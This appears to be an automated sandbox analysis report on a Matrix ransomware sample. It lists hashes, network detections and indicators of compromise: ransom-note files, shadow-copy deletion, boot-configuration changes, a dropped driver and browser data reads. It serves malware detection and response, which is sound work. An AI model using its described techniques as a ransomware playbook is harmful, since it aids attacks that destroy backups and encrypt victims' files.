Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
06-03-2022 03:26
Static task
static1
Behavioral task
behavioral1
Sample
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe
Resource
win10v2004-en-20220113
General
-
Target
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe
-
Size
3.8MB
-
MD5
6fa2ff1dad01f838e0bb814affccd0c6
-
SHA1
8c26dfd9d19c3b45cd057f895f80d43326fc986d
-
SHA256
e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c
-
SHA512
de88757ee96943eaec582760b1631befb09ea8b9a5c8c757e24431978e3338ea7dd922e2b3dd1a47e514bb0ea93252171236f817c4d1220794e9472c8c2f24d3
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Public\Libraries\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\88000045\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1pj39gsm.default-release\storage\permanent\chrome\idb\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jre1.8.0_66\lib\management\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\_platform_specific\win_x64\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\97.0.1072.55\Notifications\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jre1.8.0_66\lib\deploy\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Google\Update\1.3.36.71\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\ProgramData\Oracle\Java\installcache_x64\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1pj39gsm.default-release\datareporting\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\dtplugin\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\WidevineCdm\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1pj39gsm.default-release\OfflineCache\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1pj39gsm.default-release\storage\permanent\chrome\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1pj39gsm.default-release\startupCache\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.153.55\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Office\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe -
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2584 bcdedit.exe 4344 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 144 2684 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS ETYBXuQh64.exe -
Executes dropped EXE 3 IoCs
pid Process 2548 NWDoIXfb.exe 400 ETYBXuQh.exe 636 ETYBXuQh64.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000400000001e7cb-148.dat upx behavioral2/files/0x000400000001e7cb-149.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 808 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Users\Public\Pictures\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Libraries\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Documents\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Videos\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Searches\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Music\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Links\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Videos\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Music\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Desktop\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Documents\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Users\Public\Downloads\desktop.ini e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\F: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\A: ETYBXuQh64.exe File opened (read-only) \??\E: ETYBXuQh64.exe File opened (read-only) \??\L: ETYBXuQh64.exe File opened (read-only) \??\W: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\P: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\M: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\R: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\K: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\G: ETYBXuQh64.exe File opened (read-only) \??\H: ETYBXuQh64.exe File opened (read-only) \??\Q: ETYBXuQh64.exe File opened (read-only) \??\Z: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\Y: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\S: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\S: ETYBXuQh64.exe File opened (read-only) \??\O: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\F: ETYBXuQh64.exe File opened (read-only) \??\T: ETYBXuQh64.exe File opened (read-only) \??\J: ETYBXuQh64.exe File opened (read-only) \??\U: ETYBXuQh64.exe File opened (read-only) \??\H: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\B: ETYBXuQh64.exe File opened (read-only) \??\I: ETYBXuQh64.exe File opened (read-only) \??\N: ETYBXuQh64.exe File opened (read-only) \??\R: ETYBXuQh64.exe File opened (read-only) \??\X: ETYBXuQh64.exe File opened (read-only) \??\Z: ETYBXuQh64.exe File opened (read-only) \??\U: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\T: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\Q: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\V: ETYBXuQh64.exe File opened (read-only) \??\W: ETYBXuQh64.exe File opened (read-only) \??\Y: ETYBXuQh64.exe File opened (read-only) \??\N: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\E: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\K: ETYBXuQh64.exe File opened (read-only) \??\M: ETYBXuQh64.exe File opened (read-only) \??\P: ETYBXuQh64.exe File opened (read-only) \??\L: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\J: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\G: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\X: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\V: e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened (read-only) \??\O: ETYBXuQh64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 143 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Syit07VC.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\or.pak e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\97.0.1072.55\msedge_elf.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\localedata.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Mozilla Firefox\libGLESv2.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mi.pak.DATA e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libscte18_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.password.template e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\ConvertSet.m4a e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\keystore\libmemory_keystore_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Content.DATA e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\control\libnetsync_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\rmiregistry.exe e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_zh-TW.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libcc_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libfluidsynth_plugin.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_features.txt e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\ReceiveWait.m4a e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\resources.pri e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.55\msedgeupdateres_sl.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jconsole.exe e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\fontmanager.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\97.0.1072.55\Locales\km.pak e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.55\msedgeupdateres_pl.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\BHO\ie_to_edge_bho_64.dll e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#ANN_README#.rtf e6b4bd102c3151b6639945d82eb560b00515ce82f64da494b38f29604473507c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\gui\libskins2_plugin.dll 